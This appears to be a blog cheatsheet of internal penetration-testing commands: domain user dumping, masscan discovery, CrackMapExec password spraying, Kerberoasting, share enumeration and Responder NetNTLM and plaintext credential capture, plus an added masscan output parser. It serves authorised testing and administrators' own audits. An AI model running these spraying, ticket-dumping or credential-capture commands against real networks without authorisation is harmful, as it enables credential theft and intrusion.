Internal Pentesting Tools & Cheatsheet


I’ve had a lot of people emailing us asking for some of our common command usage for internal penetration testing engagements. This is a list from our internal notes that is great for beginners or administrators looking to gain some information from their own internal network.


Dumping all domain users

ldapdomaindump -u 'domain\username' -p Password <domaincontrollerIP>

Masscan Usage

Discovery on a private IP range. Note: a high rate will crash the network

masscan --ping <ipaddress> --rate=200 -oG filename.txt

Extracting (mostly) just the IP addresses

cat filename.txt | awk '{print $4}' > filename-delimited.txt
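The fixed-column `awk '{print $4}'` above also emits a word from each `#` header/footer line and breaks if the `Timestamp:` field is absent, which is why it is only "mostly" IPs. The following is an added example, not part of the original notes: it keys on the `Host:` label instead of a column number, de-duplicates, and can filter on an open port. The grepable line layouts in the comments are an assumption, and the sample input is constructed.

```shell
# Added example (not from the original post).
# Assumed masscan -oG line layouts:
#   Timestamp: <epoch>\tHost: <ip> ()\tPorts: <port>/<state>/<proto>//<svc>//
#   Host: <ip> ()\tPorts: <port>/<state>/<proto>//<svc>//
#   # ... comment lines at the start and end of the file

# masscan_hosts [port] : reads grepable output on stdin, prints unique IPs.
# With a port argument, only hosts reported open on that port are printed.
masscan_hosts() {
    awk -v want="${1:-}" '
        /^#/ { next }                        # skip header/footer comments
        {
            ip = ""; port = ""; state = ""
            for (i = 1; i < NF; i++) {
                if ($i == "Host:")  ip = $(i + 1)
                if ($i == "Ports:") {
                    split($(i + 1), p, "/")  # port/state/proto/...
                    port = p[1]; state = p[2]
                }
            }
            # drop anything that is not a dotted quad
            if (ip !~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/) next
            if (want != "" && (port != want || state != "open")) next
            if (!seen[ip]++) print ip        # de-duplicate, keep first-seen order
        }
    '
}

# Constructed sample input: comments, a duplicate host, a non-SMB port,
# and one line without the Timestamp field.
sample_grepable() {
    printf '# Masscan scan initiated (constructed header)\n'
    printf 'Timestamp: 1700000000\tHost: 10.0.0.5 ()\tPorts: 445/open/tcp//microsoft-ds//\n'
    printf 'Timestamp: 1700000001\tHost: 10.0.0.9 ()\tPorts: 80/open/tcp//http//\n'
    printf 'Timestamp: 1700000002\tHost: 10.0.0.5 ()\tPorts: 445/open/tcp//microsoft-ds//\n'
    printf 'Host: 10.0.0.12 ()\tPorts: 445/open/tcp//microsoft-ds//\n'
    printf '# Masscan done (constructed footer)\n'
}

sample_grepable | masscan_hosts 445
```

Against a real scan file, the equivalent call is `masscan_hosts 445 < filename.txt > filename-delimited.txt`.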

Discovering Windows hosts (hosts with SMB open)

masscan -p445 <ipaddress> --rate=200 -oG filename.txt

CrackMapExec Usage

Discovering Windows hosts (hosts with SMB open)

crackmapexec smb <ipaddress>

Resolving a list of IP addresses to hostnames

crackmapexec smb filename.txt

Spraying a user account username and password

crackmapexec smb <ipaddress> -u jsmith -p Password1 -d domain.local

Dumping Kerberos tickets

crackmapexec smb <domaincontrollerip> -u jsmith -p Password1 -d domain.local --kerberoasting output.txt

Dumping users

crackmapexec smb <domaincontrollerip> -u jsmith -p Password1 --users

Dumping shares and grepping for the right permissions


crackmapexec smb filename.txt -u jsmith -p Password1 -d domain.local --shares > shares.txt

cat shares.txt | grep --text READ    # show all readable shares
cat shares.txt | grep --text WRITE   # show all writeable shares

For more usage, visit

Responder/NTLMRelayx Usage

Basic NetNTLM Capture

responder -I eth0 -wF

Plaintext Capture (USE WITH CAUTION)

responder -I eth0 -Pb

